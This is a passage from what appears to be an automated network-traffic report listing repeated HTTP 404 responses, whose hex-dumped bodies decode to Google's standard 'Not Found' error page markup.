73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 